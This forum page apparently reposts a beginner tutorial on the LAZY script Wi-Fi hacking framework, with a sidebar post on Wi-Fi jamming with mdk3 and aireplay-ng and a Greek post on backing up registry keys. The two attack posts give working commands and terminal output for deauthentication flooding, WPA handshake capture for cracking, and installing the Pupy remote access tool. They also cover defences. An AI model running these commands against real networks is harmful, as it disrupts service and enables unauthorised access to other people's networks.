Jump to content
Anastasis

Hack Wi-Fi & Networks More Easily with Lazy Script

Recommended Posts

Anastasis

Wi-Fi tools keep getting more and more accessible to beginners, and the LAZY script is a framework of serious penetration tools that can be explored easily from within it. This powerful and simple tool can be used for everything from installing new add-ons to grabbing a WPA handshake in a matter of seconds. Plus, it's easy to install, set up, and utilize.

 

Attack Frameworks

Most new Wi-Fi hacking tools rely on many of the same underlying attacks, and scripts that automate using other more familiar tools like Aireplay-ng are often referred to as frameworks. These frameworks try to organize tools in smart or useful ways to take them a step beyond the functionality or usability of the original program.

An excellent example of this are programs that integrate scanning tools like Airodump-ng, attacks like WPS Pixie-Dust, and cracking tools like Aircrack-ng to create an easy-to-follow attack chain for beginners. Doing this makes the process of using these tools easier to remember and can be seen as sort of a guided tour. While each of these attacks is possible without the hand-holding, the result can be faster or more convenient than trying to do so yourself.

An example of this we've covered is the Airgeddon framework, a wireless attack framework that does useful things like automating the target selection process and eliminating the time a user spends copying and pasting information between programs. This saves valuable time for even experienced pentesters but has the disadvantage of preventing beginners from understanding what's happening "under the hood" of the attack. While this is true, most of these frameworks are fast, efficient, and dead simple to use, enabling even beginners to take on and disable an entire network.

UX/UI Improvements for Beginners

I'll be going through a new script that attempts to create a friendlier way for beginners to start using some of the best and most reliable hacking techniques. While the script is designed to be as "lazy" as possible by requiring a minimum of user interaction, it's also useful and powerful for beginners or experienced users looking to blast through a penetration test quickly.

The focus in attack frameworks is to anticipate better what the hacker will be trying to do and pull together the necessary tools to execute the attack with a minimum of interaction from the user. In this way, the user interface and experience become the primary goal, and the script has the purpose of anticipating the tools and tactics a penetration tester would need quick access to in the field.

The LAZY script starts by merely typing the letter l into a terminal window, then it asks for the name of your network interfaces after the first run. It uses the names you supply to connect to the tools needed to execute any attacks you select. Aside from that initial input, the majority of the possible attacks can be performed merely by choosing the option number from the menu. This means you can grab a network handshake or download a new hacking tool like Pupy by just selecting from one of the menu options.

Extending Usability & Curating Applications

The benefit of the LAZY script is that it was built with penetration testers in mind. This means it's essentially a guided tour through some of the best and most potent scripts available today. Some of the most easily accessible menu options include quick access to networking information like the gateway IP (usually the router), your IP address, MAC address, and a scan function that executes an ARP scan to reveal all other devices on the network.

hack-wi-fi-networks-more-easily-with-laz

The primary sub-menus are also broken down by functions a pentester would want easy access to. The general focus is handshakes, WPS PIN attacks, WEP attacks, MitM attacks, and the Metasploit Framework. Anonsurf is also included for analyzing internet traffic, and social engineering attacks like email spoofing are provided. If you see a tool in red, it means you don't have it yet. To get it, you can select it and type install, and the script will do it for you.

Tool is not installed. To install it type 'install'.
install
Installing Dagon
Tool by Ekultek
Cloning into 'dagon'...
remote: Counting objects: 1236, done.
remote: Total 1236 (delta 0), reused 0 (delta 0), pack-reused 1235
Receiving objects: 100% (1236/1236), 319.35 KiB | 1.76 MiB/s, done.
Resolving deltas: 100% (666/666), done.
Collecting pysha3==1.0.2 (from -r requirements.txt (line 1))
Downloading https://files.pythonhosted.org/packages/c5/bb/7d793dfab828e01adb46e3c5976fe99acda12a954c728427cceb2acd7ee9/pysha3-1.0.2-cp27-cp27mu-manylinux1_x86_64.whl (127kB)
    100% |██████████████████████████████| 133kB 1.5MB/s
Requirement already satisfied: requests in /usr/lib/python2.7/dist-packages (from -r requirements.txt (line2))
Collecting colorlog==2.10.0 (from -r requirements.tx (line 3))
Downloading https://files.pythonhosted.org/packages/61/ff/d6337d488739c1a7ade37f736880e44717bcb0e7cea178c17774a4a93700/colorlog-2.10.0-py2.py3-none-any.whl
Requirement already satisfied: passlib=1.7.1 in /usr/lib/python2.7/dist-packages (from -r requirements.txt (line4))
Collecting bcrypt==3.1.3 (from -r requirements.txt (line 5))
Downloading https://files.pythonhosted.org/packages/a6/da/5d7ac371b4c9a8ac9e8ea62cff7c090e9d7d7b7ea3f2ad8b8c8da65db058/bcrypt-3.1.3-cp27-cp27mu-manylinux1_x86_64.whl (57kB)
    100% |██████████████████████████████| 61kB 9.9MB/s
Requirement already satisfied: six>=1.4.1 in /usr/lib/python2.7/dist-packages (from bcrypt==3.1.3->-r requirements.txt (line 5))
Collecting cffi>=1.1 (from bcrypt==3.1.3->-r requirements.txt (line 5))
Downloading https://files.pythonhosted.org/packages/14/dd/3e7a1e1280e7d767bd3fa15791759c91ec19058ebe31217fe66f3e9a8c49/cffi-1.11.5-cp27-cp27mu-manylinux1_x86_64.whl (407kB)
    100% |██████████████████████████████| 409kB 2.1MB/s
Collecting pycparser (from cffi>=1.1->bcrypt==3.1.3->-r requirements.txt (line 5))
Downloading https://files.pythonhosted.org/packages/8c/2d/aad7f16146f4197a11f8e91fb81df177adcc2073d36a17b1491fd09df6ed/pycparser-2.18.tar.gz (245kB)
    100% |██████████████████████████████| 256kB 2.8MB/s
Building wheels for collected packages: pycparser

Step 1Update Kali Linux

To use the LAZY script, you'll need a fully updated version of Kali Linux. The script comes with a very helpful installer script, and I was able to set it up on both a laptop running Kali as its primary OS and a virtual machine with no problems.

If your Kali system is fully updated, you can generally expect a pretty smooth installation process. Make sure your system is up to date by running the following commands before getting started.

apt update
apt upgrade

Step 2Find Your Wireless Network Adapter's Name

The script will require you to provide the name of the network adapter you want to use, as well as the name your system calls your network adapter when it's in monitor mode. This is where some troubleshooting may need to happen. Usually, a Kali-compatible wireless network adapter will be wlan0 or wlan1, and in monitor mode, change its name to wlan0mon or wlan1mon. Sometimes, you may notice wlan0 stays wlan0 and isn't renamed when put into monitor mode, which means you'll need to set this up in the LAZY script, or it will fail because it will try to use a wlan0mon interface that doesn't exist.

You can check to see what name your adapter is in after putting it into monitor mode by using the following command and observing the name of the adapter after with the command below, with wlan0 as the name of your adapter.

iwconfig wlan0 mode monitor
ip a

Once you know the name of the adapter and the name it's changed to in monitor mode, we can get started downloading and using the "lazy" script.

Step 3Install & Configure Lazy Script

Installing the LAZY script is incredibly easy. To do so, you can open a terminal window and copy and paste in the code below, one line at a time. You'll cd into root, clone the LAZY script from GitHub, cd into LAZY script, give the install.sh file execute permissions, then install LAZY script.

cd
git clone https://github.com/arismelachroinos/lscript.git
cd lscript
chmod +x install.sh
./install.sh

When this completes, you should be able to open a new terminal window and type the letter l to open LAZY script. You'll need to follow any prompts along the way, answering if you're installing the script for the first time or reinstalling it, and then setting the network interfaces. Not bad for a script that prides itself on minimal user interaction.

When setting the user interface, this is where you'll put the name of your wireless network adapter, both in managed and monitor mode, and then the name of your Ethernet adapter.

You can go back and change this by typing interface if you add another network adapter or want to switch between the internal and external network card. Once this is set, you can get to work using LAZY script.

Step 4Use Basic Networking Tools

To begin, we can access data about the network we're currently connected to, as well as any network interfaces, from the main menu. Here, we can find local information by just typing l to pull up local IP information, as seen below.

Local IPs:
eth0 = 192.168.86.42

Gateways:
eth0 = 192.168.86.1
Press any key to go back...

This allows us to do things like scan the network for other devices. This part of LAZY script gives us better visibility on a network and situational awareness of what devices are around us. The various information can be broken down as follows:

  • if - Runs ifconfig and gives the names and information about all network devices.
  • 1 - Enable wlan0 (d1 disables it).
  • 2 - Enable wlan0mon (d2 disables it).
  • 3 - Randomize or set the MAC address to a specific value.
  • 7 - View the public IP address your computer is leaving on sites you visit.
  • 19 - Look up the physical address of a given IP address to determine it's relative location.
  • scan - Start an ARP scan on the network to discover nearby devices.
  • start - Start monitor mode on the wireless network adapter.
  • stop - Stop wireless monitor mode on the network adapter.

Step 5Install New Tools

Part of the fun of LAZY script is how easy it is to add new tools to our arsenal. To demonstrate this, let's download Pupy, a Python-based RAT designed to take control of other computers on the network. We can select option 9 to access the list of tools in LAZY script.

From the next menu, the tools are broken down into major categories, with options for managing the installation of scripts. The options presented are:

  • 1 - Wi-Fi tools (tools for attacking wireless networks).
  • 2 - Remote access (tools for getting remote access to other devices and remotely managing them).
  • 3 - Information gathering (collecting intelligence on people or website).
  • 4 - Website tools (tools for exploiting or attacking sites).
  • 5 - Other (a miscellaneous collection of other hacking tools)

You can also manage your installed tools by accessing option 6. To download Pupy, we'll go to option 2, which is remote access. Here, we will see a list of different tools for remote access, and we can select option 3 for Pupy. Here, we can see Pupy is not installed because it appears in red.

hack-wi-fi-networks-more-easily-with-laz

To install Pupy, select 3, and when prompted, type install to have LAZY script manage the installation for you.

Tool is not installed. To install it type 'install'.
install
Installing Pupy
Tool by n1nj4sec
Cloning into 'pupy'...
remote: Counting objects: 16472, done.
remote: Compressing objects: 100% (35/35), done.
remote: Total 16472 (delta 20), reused 47 (delta 20), pack-reused 16416
Receiving objects: 100% (16472/16472), 27.77 MiB | 4.99 MiB/s, done.
Resolving deltas: 100% (11706/11706), done.

Once it's complete, the option should appear in green, and you will be able to use it through LAZY script. Now, we can select option 3, and immediately jump into Pupy to begin creating listeners and payloads.

1) Generate a payload
2) Start listener
b) Go back
00) Main menu
0) EXIT

We can now type 00 to go back to the main menu to explore some more of LAZY script's functions.

Step 6Capture a WPA Handshake Through Lazy Script

The last feature of LAZY script I'll introduce is the quick-and-easy way of grabbing a WPA handshake for future cracking. This is useful if you want to hack a WPA network, which is by far the most common type of Wi-Fi network you'll find in use. Using this technique, you can quickly kick someone or something off the network you are targeting and capture the network handshake of the device reconnecting to the network.

With this handshake, you can crack the hash with a brute-force attack. This tried-and-true method is one of the most critical vulnerabilities in WPA and one of the significant things that was fixed in the new WPA3.

After returning to the main menu, we can try out one of LAZY script's top-menu functions, which is to capture a WPA (or WPA2) handshake for later cracking. If you have a Kali compatible wireless network adapter, you should have supplied this name to LAZY script in Step 3 above, or you can do so now by typing interfaces and setting the name of the adapter in station and monitor mode.

Once this is set, we can choose option 10 to select the handshake menu. First, you'll need to confirm that you want to put the adapter into monitor mode if you haven't already. Just type y to confirm and place the adapter into monitor mode. When this is done, a new terminal window will open. You'll see that no handshake is selected and a list of the attack options.

----------------------------HANDSHAKE----------------------------
 1) Scan networks nearby     Selected:None
 2) Capture handshake
 3) Aircrack the handshake
 4) Verify a handshake
 5) Clean a handshake
 6) Remove .csv and .netxml files
 0) Exit
Choose:

You can select option number 1 to scan for networks nearby, and you'll see a list of nearby network traffic. Let this run for a minute or two, and then press Crtl-C to stop the scan.

CH 12 ][ Elapsed: 6 s ][ 2018-07-04 04:33

BSSID               PWR   Beacons   #Data,  #/s    CH    MB     ENC   CIPHER  AUTH  ESSID

00:25:00:FF:94:73    -1         0       1     0     6    -1     OPN                 <length:  0>
70:3A:CB:DB:5A:78   -41        11       3     0    11    130    WPA2  CCMP    PSK   takeyourgodd
70:3A:CB:DB:5C:A8   -59        22       0     0     6    130    WPA2  CCMP    PSK   takeyourgodd
70:3A:CB:DB:5C:B4   -71         6       0     0     1    130    WPA2  CCMP    PSK   takeyourgodd
C4:8E:8F:E5:6A:B4   -75         7       0     0     1    195    WPA2  CCMP    PSK   TG1672G12

BSSID               STATION         PWR   RATE      Lost    Frames  Probe

00:25:00:FF:94:73   obfuscated      -43    0 -12      21         8
00:25:00:FF:94:73   obfuscated      -33    0 -12     104         4
00:25:00:FF:94:73   obfuscated      -51    0 -12     107         4
00:25:00:FF:94:73   obfuscated      -53    0 -12      34         8
(not associated)    obfuscated      -70    0 - 1      12         8

You'll see a list of networks that have traffic on them, allowing you to find targets for the next stage of the attack. This comes along with a handy color code. Select the number of the target network and press return to continue. It's worth noting you can go back to this screen to select another network by typing b in any later step, saving you from needing to scan a second time.

hack-wi-fi-networks-more-easily-with-laz

After selecting our target network, we'll be presented with the option to either supply a file name to save the handshake to or choose 0 to not keep a file for this session. Here, name the file something you'll remember later.

After entering a name and pressing return, a new window will open presenting you with options for kicking devices off the network. Select option 1 to deauthenticate all clients and get the network handshake quickly. Make sure you have permission to do this on the network you're working on, as you'll be denying service to the network you target until you get the handshake. As a final input, select the number of deauth packets to send, with 0 being a continuous stream until you decide to quit.

----------------DEAUTH MENU----------------

 1) Deauth all                   aireplay-ng
 2) Deauth all                   mdk3
 3) Deauth client/s              aireplay-ng
 4) Deauth all periodically      aireplay-ng
 0) Exit
-------------------------------------------HANDSHAKE-------------------------------------------

CH 11 ][ Elapsed: 12 s ][ 2018-07-04 04:33

BSSID               PWR  RXQ  Beacons   #Data,  #/s  CH   MB   ENC    CIPHER  AUTH  ESSID

70:3A:CB:DB:5A:78   -40   87      134      92     6  11  130   WPA2   CCMP    PSK   takeyourgodd

BSSID               STATION         PWR     Rate      Lost  Frames  Probe

70:3A:CB:DB:5A:78   obfuscated      -72      0 - 0      22       6

A new window will open, showing the status of the deauthentication attack. When you see the "WPA handshake" appear in the top right corner, you know you've gotten the handshake for the network. Press Ctrl-C to stop the deauth attack.

----------------DEAUTH MENU----------------

 1) Deauth all                   aireplay-ng
 2) Deauth all                   mdk3
 3) Deauth client/s              aireplay-ng
 4) Deauth all periodically      aireplay-ng
ENTER) Last option
 0) Exit
-------------------------------------------HANDSHAKE-------------------------------------------

CH 11 ][ Elapsed: 2 mins ][ 2018-07-04 04:36 ][ WPA handshake: 70:3A:CB:DB:5A:78

BSSID               PWR  RXQ  Beacons   #Data,  #/s  CH   MB   ENC    CIPHER  AUTH  ESSID

70:3A:CB:DB:5A:78    -7  100     1307     151     2  11  130   WPA2   CCMP    PSK   takeyourgodd

BSSID               STATION         PWR     Rate        Lost  Frames  Probe

70:3A:CB:DB:5A:78   obfuscated      -33      1e - 1e       0      12
---------------------------------DEAUTHING---------------------------------

04:36:17 Sending DeAuth (code 7) to broadcast -- BBSID: [70:3A:CB:DB:5A:78]
04:36:18 Sending DeAuth (code 7) to broadcast -- BBSID: [70:3A:CB:DB:5A:78]
04:36:18 Sending DeAuth (code 7) to broadcast -- BBSID: [70:3A:CB:DB:5A:78]
04:36:19 Sending DeAuth (code 7) to broadcast -- BBSID: [70:3A:CB:DB:5A:78]
04:36:19 Sending DeAuth (code 7) to broadcast -- BBSID: [70:3A:CB:DB:5A:78]
04:36:19 Sending DeAuth (code 7) to broadcast -- BBSID: [70:3A:CB:DB:5A:78]
04:36:20 Sending DeAuth (code 7) to broadcast -- BBSID: [70:3A:CB:DB:5A:78]
04:36:20 Sending DeAuth (code 7) to broadcast -- BBSID: [70:3A:CB:DB:5A:78]
04:36:21 Sending DeAuth (code 7) to broadcast -- BBSID: [70:3A:CB:DB:5A:78]
04:36:21 Sending DeAuth (code 7) to broadcast -- BBSID: [70:3A:CB:DB:5A:78]
04:36:22 Sending DeAuth (code 7) to broadcast -- BBSID: [70:3A:CB:DB:5A:78]
04:36:22 Sending DeAuth (code 7) to broadcast -- BBSID: [70:3A:CB:DB:5A:78]
04:36:23 Sending DeAuth (code 7) to broadcast -- BBSID: [70:3A:CB:DB:5A:78]
04:36:23 Sending DeAuth (code 7) to broadcast -- BBSID: [70:3A:CB:DB:5A:78]

After selecting the network, you'll be in the "handshake" menu. Here, we can confirm the handshake we just captured by selecting option 4 which is to verify a handshake.

----------------------------HANDSHAKE----------------------------
 1) Scan networks nearby     Selected:takeyourgoddamnshoesoff
 2) Capture handshake
 3) Aircrack the handshake
 4) Verify a handshake
 5) Clean a handshake
 6) Remove .csv and .netxml files
 0) Exit
Choose:

In the deauth menu, you'll see the options for verifying you've successfully captured a handshake. Select option 2 to check the handshake with Cowpatty.

-------DEAUTH MENU-------

 1) Check with pyrit
 2) Check with cowpatty
 b) Go back
Choose:
1
-------------------------------------------HANDSHAKE-------------------------------------------

CH 11 ][ Elapsed: 12 s ][ 2018-07-04 04:37

BSSID               PWR  RXQ  Beacons   #Data,  #/s  CH   MB   ENC    CIPHER  AUTH  ESSID

70:3A:CB:DB:5A:78   -40  100      156       0     0  11  130   WPA2   CCMP    PSK   takeyourgodd

BSSID               STATION         PWR     Rate        Lost  Frames  Probe

Here, you can see our handshake is valid:

-------DEAUTH MENU-------

Valid handshake found!
-------------------------------------------HANDSHAKE-------------------------------------------

CH 11 ][ Elapsed: 12 s ][ 2018-07-04 04:37

BSSID               PWR  RXQ  Beacons   #Data,  #/s  CH   MB   ENC    CIPHER  AUTH  ESSID

70:3A:CB:DB:5A:78   -37   96      297       0     0  11  130   WPA2   CCMP    PSK   takeyourgodd

BSSID               STATION         PWR     Rate        Lost  Frames  Probe

After confirming the handshake is valid, you'll be dropped back into the handshake menu. Select option 0 to exit the script.

----------------------------HANDSHAKE----------------------------
 1) Scan networks nearby     Selected:takeyourgoddamnshoesoff
 2) Capture handshake
 3) Aircrack the handshake
 4) Verify a handshake
 5) Clean a handshake
 6) Remove .csv and .netxml files
 0) Exit
Choose:

On your way out, the script will ask if you captured a WPA handshake. If you did, make sure to type y to save the handshake you captured under the filename you provided earlier. Otherwise, the file will be discarded. If you're keeping the file, you can also type y for cleaning the file, which will make it smaller by getting rid of all the non-relevant packets that were captured.

At this point, we would run a brute-force attack against this with Aircrack-ng. I tried LAZY script's built-in brute forcer, but it wasn't able to properly read the location of my dictionary file, so I don't recommend it in its current iteration.

Step 7Use a WPS Pixie-Dust Attack (A Work in Progress)

While LAZY script does include a WPS module, the versions I tried in virtual machines and on a Kali laptop weren't able to successfully crack our test WPS PIN. Two of the primary attacks returned "too many arguments" rather than any useful results. The final option, a Pixie-Dust loop, ended in an error after an anticlimactic buildup.

hack-wi-fi-networks-more-easily-with-laz

Network Hacking for the Lazy

LAZY script is a tool that attempts to bring together the best tools with a minimum of interaction, stitching together popular hacking tools with a series of clever shell scripts. This makes the necessary tactics of Wi-Fi hacking, such as WPA brute-forcing, accessible to even the most inexperienced users.

If you've become lazy with your Wi-Fi security at home, this is a wakeup call that you need to take things like setting your Wi-Fi password seriously. Don't pick a password which is short or easy to guess or one that you've already used in many other places. If you need a refresher on how to keep your own Wi-Fi safe, you can check out my previous guide on defending against the main types of Wi-Fi hacking, most of which LAZY script includes.

Share this post


Link to post
Share on other sites

Δημιουργήστε ένα λογαριασμό ή συνδεθείτε προκειμένου να το δείτε

Πρέπει να είστε μέλος για να μπορέσετε να αφήσετε κάποιο σχόλιο

Δημιουργία λογαριασμού

Κάντε μια δωρεάν εγγραφή στην κοινότητά μας. Η εγγραφές μας είναι εύκολες.!

Εγγραφή τώρα

Σύνδεση

Εάν έχετε ήδη λογαριασμό σε αυτό το Forum; Συνδεθείτε εδώ.

Συνδεθείτε τώρα

  • Μηνύματα

    • Anastasis
      You may have heard of a signal jammer before, usually referring to a device that blasts out a strong enough radio signal to drown out the reception of nearby devices like cell phones. Purpose-built jammer hardware is outright illegal in many countries, but Wi-Fi is vulnerable to several different jamming attacks that can be done with Kali Linux and a wireless network adapter. Traditional signal jamming has been a cat and mouse game of detecting and disabling signals an opponent is using to communicate. Cutting off a target's ability to communicate leaves them isolated and vulnerable, making jamming these signals a top priority in modern day electronic warfare. Countries today have developed capabilities to jam and spoof cell phones, GPS, Wi-Fi, and even satellite links. Different Types of Jamming There are two main types of jammers: elementary and advanced. Here, we'll be discussing elementary Wi-Fi jamming, focusing on unencrypted management frames. Elementary jammers can be broken into two main types: proactive and reactive. The first type, a proactive jammer, is one that continuously functions whether there is traffic on a network or not. We'll be using MDK3 as a deceptive jammer, which injects normal-seeming packets that have a malicious effect on the network. Image by Justin Meyers/Null Byte Jammers used in electronic warfare typically require equipment that overwhelms the signal of the target with radio energy, making it impossible to distinguish between the signal and the noise being introduced to the channel the target is using to communicate. This kind of jamming is popular because it works, but it also requires specialized equipment that is banned or heavily regulated in most countries. Another type of jamming attempts to send messages that force the target to be disconnected from the network they are connected to, rather than drowning out a target's signal by trying to overwhelm it. You might think this kind of attack might only work if you are connected to the network, but this is where WPA has a severe flaw. Because so-called management frames are not encrypted, it is possible to send disruptive messages from outside the network which causes people inside the network to be unable to connect. Deauthentication Packets The most common way this sort of attack is done is with deauthentication packets. These are a type of "management" frame responsible for disconnecting a device from an access point. Forging these packets is the key to hacking many Wi-Fi networks, as you can forcibly disconnect any client from the network at any time. The ease of which this can be done is somewhat frightening and is often done as part of gathering a WPA handshake for cracking. Aside from momentarily using this disconnection to harvest a handshake to crack, you can also just let those deauths keep coming, which has the effect of peppering the client with deauth packets seemingly from the network they are connected to. Because these frames aren't encrypted, many programs take advantage of management frames by forging them and sending them to either one or all devices on a network. Don't Miss: Disable Security Cams on Any Wireless Network with Aireplay-ng Programs like Aireplay-ng rely on deauthentication packets to execute denial of service attacks, and this kind of tactic is often a part of the first WPA brute-forcing a hacker will learn. Spamming a target with deauth packets is simple but effective, often producing near-immediate action on the mark. But many who use Aireplay-ng may not know that there is another kind of management frame that can be abused to take out clients on a WPA network. Dissasociation Packets Disassociation packets are another type of management frame that is used to disconnect a node (meaning any device like a laptop or cell phone) from a nearby access point. The difference between deauthentication and disassociation frames is primarily the way they are used. An AP looking to disconnect a rogue device would send a deauthentication packet to inform the device it has been disconnected from the network, whereas a disassociation packet is used to disconnect any nodes when the AP is powering down, rebooting, or leaving the area. Different networks may be equipped with different countermeasures, so deauthentication itself may not work. In fact, WPA3 protects against this attack, as do some types of WPA2. According to the Wi-Fi Alliance website: Because of this, deauthentication and disassociation attacks are just one of many which may be employed against a Wi-Fi network. While there are more advanced jamming attacks based on interrupting CTS (clear to send) or data packets, we'll save those attacks for another guide. For now, we'll start using a mix of deauthentication and disassociation to increase our chances of persistently taking out a network. MDK3 vs. Aireplay-ng To understand Aireplay-ng vs MDK3 as jamming tools, we should take a look at the help file for each tool. For Aireplay-ng, we see the following relevant information. Aireplay-ng 1.2 rc4 - (C) 2006-2015 Thomas d'Otreppe http://www.aircrack-ng.org usage: aireplay-ng <options> <replay interface> Filter options: -b bssid : MAC address, Access Point -d dmac : MAC address, Destination -s smac : MAC address, Source -m len : minimum packet length -n len : maximum packet length -u type : frame control, type field -v subt : frame control, subtype field -t tods : frame control, To DS bit -f fromds : frame control, From DS bit -w iswep : frame control, WEP bit -D : disable AP detection Attack modes (numbers can still be used): --deauth count : deauthenticate 1 or all stations (-0) --fakeauth delay : fake authentication with AP (-1) --interactive : interactive frame selection (-2) --arpreplay : standard ARP-request replay (-3) --chopchop : decrypt/chopchop WEP packet (-4) --fragment : generates valid keystream (-5) --caffe-latte : query a client for new IVs (-6) --cfrag : fragments against a client (-7) --migmode : attacks WPA migration mode (-8) --test : tests injection and quality (-9) --help : Displays this usage screen While the tools included are interesting, only --deauth is helpful in jamming a Wi-Fi connection. Based on these filter settings, we can use Aireplay-ng to attack specific nodes on specific APs. We can do so with a command like below. aireplay-ng -0 0 -a f2:9f:c2:34:55:69 -c a4:14:37:44:1f:ac wlan0mon This command uses the wlan0 interface in monitor mode to send an unlimited stream of deauths to the client at MAC address a4:14:37:44:1f:ac which is connected to the access point with a MAC address of f2:9f:c2:34:55:69. This attack is surgical and usually starts working immediately, but can fail or not be very effective on some networks. MDK3, by comparison, has less surgical filters listen in its help file. MDK 3.0 v6 - "Yeah, well, whatever" MDK is a proof-of-concept tool to exploit common IEEE 802.11 protocol weaknesses. MDK USAGE: mdk3 <interface> <test_mode> [test_options] TEST MODES: b - Beacon Flood Mode Sends beacon frames to show fake APs at clients. This can sometimes crash network scanners and even drivers! a - Authentication DoS mode Sends authentication frames to all APs found in range. Too many clients freeze or reset some APs. p - Basic probing and ESSID Bruteforce mode Probes AP and check for an answer, useful for checking if SSID has been correctly decloaked or if AP is in your adaptors sending range SSID Bruteforcing is also possible with this test mode. d - Deauthentication / Disassociation Amok Mode Kicks everybody found from AP m - Michael shutdown exploitation (TKIP) Cancels all traffic continuously x - 802.1X tests w - WIDS/WIPS Confusion Confuse/Abuse Intrusion Detection and Prevention Systems f - MAC filter bruteforce mode This test uses a list of known client MAC Adresses and tries to authenticate them to the given AP while dynamically changing its response timeout for best performance. It currently works only on APs who deny an open authentication request properly g - WPA Downgrade test deauthenticates Stations and APs sending WPA encrypted packets. With this test you can check if the sysadmin will try setting his network to WEP or disable encryption. With MDK3, we see a few attractive options. Option g will attempt to force a network administrator to disable or downgrade encryption by targeting any connection sending WPA encrypted packets with deauthentication attacks. Option b attempts a beacon flood attack, randomly creating fake APs in the area, and option a attempts to jam a network by sending too many authentication frames. Neither of these attacks works for jamming the network, so instead, the most useful attack is option d. The Deauthentication / Disassociation Amok Mode attack by default kicks everyone off of any nearby network, but with some filters, we can get it to behave more surgically. What You'll Need To get started, you'll need a fully updated copy of Kali Linux and a Kali-compatible wireless network adapter. If you need help choosing one, you can check out our guide below. To update your copy of Kali Linux, connect to the internet, open a terminal window, and run the commands below. apt update apt upgrade Step 1Install MDK3 Kali includes MDK3 by default, but if you don't have it installed, you can do so by typing the following. apt install mdk3 Once this is installed, you can type mdk3 --help to see the main options. Step 2Jam an Area Taking a look at the filter options for MDK3, we can type mdk3 --help d to get the help information for the deauthentication module specifically. Here we can see that it is different from the options for Aireplay-ng. Instead, we have the following options to craft our attack. -w flag for MAC addresses to ignore, or whitelist. -b flag for MAC addresses to attack, or blacklist. -s flag for the speed (packets per second) of the attack. -c flag for the channel to run the attack on. Based on these options, we'll need to, at the very minimum, have one piece of information to start jamming anything. First, we'll need to put our network adapter into monitor mode and supply the name of the adapter in monitor mode to the program so it can execute. To find this, we can type either ifconfig or the newer ip a in a terminal window to find the name of the network adapter. It should be something like "wlan0" or "wlan1." When you have the name of the device, you can put it into monitor mode with the following airmon-ng command, where wlan0 is the name of your network card. sudo airmon-ng start wlan0 Once you've done so, type ifconfig or ip a again to get the new name of the device. You can expect it to be something like "wlan0mon." When you have this information, you can run the script to deauthenticate everything nearby. This is noisy, not as effective as target jamming, and may require one card to work persistently. In my tests, one network card attacking everything nearby caused few noticeable disruptions, whereas three network cards attacking everything nearby caused noticeably annoying disconnections from the network. To execute the attack, type the following in a terminal window, with wlan0mon as the name of your adapter in monitor mode. mdk3 wlan0mon d Because this attack has to hop channels, it is likely to miss some APs and it may not be very fast. It's also very disruptive, as it can disconnect anything in range regardless of whether you have permission or if it's relevant to what you're doing. Step 3Jam a Channel A better option for jamming an area is to jam a channel. To know what channel to jam, we can use another tool called Airodump-ng to discover what channel our target is on. With our card in monitor mode as wlan0mon, we can type the following command to see information about all nearby wireless networks. airodump-ng wlan0mon This will display all nearby access points, along with information about them. Here we can see which channel the access point we are targeting is on, which will limit our effect to a single channel rather than marauding around attacking anything that moves. Once we know the channel the AP is on, we can press Ctrl-C to cancel the scan, and type the following into a terminal window, with the channel we're attacking being channel 6. mdk3 wlan0mon -c 6 Jamming a channel is very effective, but affects all APs and all devices operating on that channel. This can still be too noisy, so we'll need to refine this further to match the same targeting capabilities as Aireplay-ng. Step 4Whitelist & Blacklist Devices Once we have a specific channel to attack, we can be more precise by adding a blacklist or a whitelist. To do this, we'll re-run our Airmon-ng scan, and this time, we'll copy the MAC address of the device we wish to attack. I have tested doing this for both the address of the AP and the device you want to attack. Using the MAC address of the AP will attack everything on it, whereas adding the MAC address of the device will only attack it and nothing else on the network. To get this information, we can type the following to find the APs on the channel we were targeting before, in this case, channel 6. airodump-ng wlan0mon -c 6 By specifying the channel we found before, we should be able to cut down on the number of devices we see. To find devices connected to our target network, we can look at the bottom of the output and find devices which are listed as being associated with the MAC address matching our target network. Once we find a MAC address that is associated, we can target it easily. Copy the MAC address, and then open a new terminal window. Type nano black.txt and press Enter to open a text editor window. Now, paste the MAC address of the device you wish to jam, and press Ctrl-X to close the text editor. Now, we can run MDK3 against the target network by running the command below, with black.txt as the text file we just created containing the MAC addresses we wish to jam. mdk3 wlan0mon d -c 6 -b ~/black.txt Running this should very rapidly and persistently jam the device you indicated. In reverse, you can specify networks you want to leave alone the same way, and then run the command with the -w flag instead to attack everything else on the channel instead. Protected Management Frames & WPA3 While these attacks can be scary depending on what is being targeted like a home security camera, these risks can be mitigated by using Ethernet wherever possible and upgrading the WPA3 when devices supporting it becomes available. One of the core differences between WPA2 and WPA3 is that WPA3 doesn't allow these kinds of attacks by preventing the authentication or disassociation packets from being forged in the first place. Until then, you can use devices which support protected management frames, or if you suspect that you're being targeted with an attack like this, you can detect it using an intrusion detection system (IDS). Kismet can be used as an IDS to detect this sort of attack, as it will give you a warning on detecting dissasociation or deauthentication frames being sprayed across a network.
    • Anastasis
      Κάθε φορά που πειράζετε το μητρώο των Windows (Windows registry), καλό θα ήταν πριν αρχίσετε να δημιουργήσετε αντίγραφα ασφαλείας των κλειδιών του μητρώου που θέλετε να επεξεργαστείτε, σε περίπτωση που κάτι δεν πάει καλά. Σε αυτή την περίπτωση, ένα εφεδρικό backup θα σας βοηθήσει να επαναφέρετε το Windows registry στην κατάσταση που ήταν. Να αναφέρουμε ότι είναι πολύ εύκολο να δημιουργήσετε αντίγραφα ασφαλείας για μεμονωμένα κλειδιά. Παρακάτω θα δούμε τον τρόπο δημιουργίας αντιγράφων ασφαλείας και επαναφοράς των κλειδιών του Μητρώου.   Αρχικά ας δούμε πως μπορείτε να πάρετε ένα αντίγραφο ασφαλείας: Ανοίξτε το μητρώο των Windows. Στην αναζήτηση πληκτρολογήστε regedit και ανοίξτε το εικονίδιο που θα εμφανιστεί στα αποτελέσματα. Από εκεί μπορείτε να βρείτε το κλειδί που θέλετε να δημιουργήσετε αντίγραφο ασφαλείας. Κάντε δεξί κλικ και επιλέξτε ‘Εξαγωγή’. Αποθηκεύστε το κλειδί μητρώου. Αν το συγκεκριμένο κλειδί περιέχει και άλλα κλειδιά κάτω από αυτό, θα αποθηκεύσετε και αυτά. Επαναφορά κλειδιών μητρώου Υπάρχουν δύο τρόποι επαναφοράς ενός κλειδιού μητρώου. Ο πρώτος είναι από τον επεξεργαστή μητρώου των Windows. Αρχείο > Εισαγωγή και επιλέξτε το κλειδί μητρώου που θέλετε να επαναφέρετε.   Ο άλλος τρόπος είναι πιο απλός. Βρείτε το κλειδί στον φάκελο που το αποθηκεύσατε, κάντε δεξί κλικ και επιλέξτε “Συγχώνευση” ή Merge όπως βλέπετε παρακάτω. Θα εμφανιστεί μια προειδοποίηση. Αποδεχτείτε τη και το κλειδί θα προστεθεί χωρίς να χρειαστεί να ανοίξετε τον επεξεργαστή μητρώου. 